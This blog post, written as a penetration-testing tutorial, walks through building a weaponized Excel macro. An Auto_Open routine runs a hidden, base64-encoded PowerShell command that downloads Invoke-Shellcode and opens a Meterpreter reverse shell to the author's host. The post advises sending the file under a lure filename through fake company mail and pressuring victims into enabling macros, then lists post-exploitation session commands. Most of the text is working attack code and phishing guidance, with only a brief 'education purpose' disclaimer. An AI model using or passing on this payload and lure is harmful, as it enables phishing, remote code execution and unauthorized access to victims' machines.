i Penetration Testing – Excel – The Old Trick – All things in moderation

Penetration Testing – Excel – The Old Trick

After the previous post, I think you guys have tried some tricks with Social Engineering Toolkit ( SET ). Believe me, this tool is worth to try. Today, I will show you my old trick that related to Social Engineering. Sometimes when you get in the victim’s network, you can’t use ARP Poisoning, I mean Web Based Attacks. At this point, you guys should try to inject some payloads into some documents and send it via a fake company mail. For example, I use Excel Macro. You guys could follow my quick tutorial to get a whole point of it.

  • Firstly, you guys open Excel then put here some funny information like this:

pentest excel

  • Secondly, you create a macro named Auto_Open() like this:
Sub Auto_Open()
Sheets("Sheet2").Visible = True
Sheets("Sheet2").Select
Dim strCommand As String
strCommand = "PowerShell.exe -Exec Bypass -NoL -Win Hidden -Enc [Base64Code]"
Shell strCommand, 0
End Sub

Do you still remember how do I create a meterpreter that connect back to my host ( If you guys forgot it, you can review it by this post.
If you guys remember it, you could just encrypt this code by base64 encode:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/12ce71b9f4b0428d9425e001e5988f91eb2b8b87/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.10.138 -Lport 443 -Force

pentest excel

And your base64 encode is here:

SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwAxADIAYwBlADcAMQBiADkAZgA0AGIAMAA0ADIAOABkADkANAAyADUAZQAwADAAMQBlADUAOQA4ADgAZgA5ADEAZQBiADIAYgA4AGIAOAA3AC8AQwBvAGQAZQBFAHgAZQBjAHUAdABpAG8AbgAvAEkAbgB2AG8AawBlAC0ALQBTAGgAZQBsAGwAYwBvAGQAZQAuAHAAcwAxACcAKQA7ACAASQBuAHYAbwBrAGUALQBTAGgAZQBsAGwAYwBvAGQAZQAgAC0AUABhAHkAbABvAGEAZAAgAHcAaQBuAGQAbwB3AHMALwBtAGUAdABlAHIAcAByAGUAdABlAHIALwByAGUAdgBlAHIAcwBlAF8AaAB0AHQAcABzACAALQBMAGgAbwBzAHQAIAAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAzADgAIAAtAEwAcABvAHIAdAAgADQANAAzACAALQBGAG8AcgBjAGUACgA=

You just put in it the [Base64Code] above and then you have just finished your macro. Then save your file as this name: Hotgirl_Telephone.xls.
You know what I mean. 😀

  • You send this excel via a mail attachment. But it has a drawback. You guys can see it here.

pentest excel

You guys need to use your social engineering to force the victim enable this macro feature.

  • After this part, everything is done. When we turn on our Listener to listen at port 443

pentest excel

the victim will connect back to our host

pentest excel

We use this command to start interact with our session:

sessions -i 1

And show their drives:

show_mount

pentest excel

List all the files in this drive

ls

pentest excel

Or their current running processes

ps

pentest excel

Because I used to use Windows command lines, so I use this command to change mode.

execute -f cmd.exe -i -H

pentest excel

And then you guys could list their files by dir command

dir

pentest excel

You could write a note.txt file for test ( You know what I mean here ? 😉 )

echo recovery sky > note.txt

pentest excel

Check it appear

dir

pentest excel

View its content

type note.txt

pentest excel

Then delete it.

del /q /f note.txt

pentest excel

Finally, if you want to exit this mode, type exit

exit

pentest excel

And run this session in background

background

pentest excel

To select another session in your list

pentest excel

Personally, I think it is enough for you guys to test the victim computer, but always keep in mind, we do this with education purpose. 😀

Leave a Reply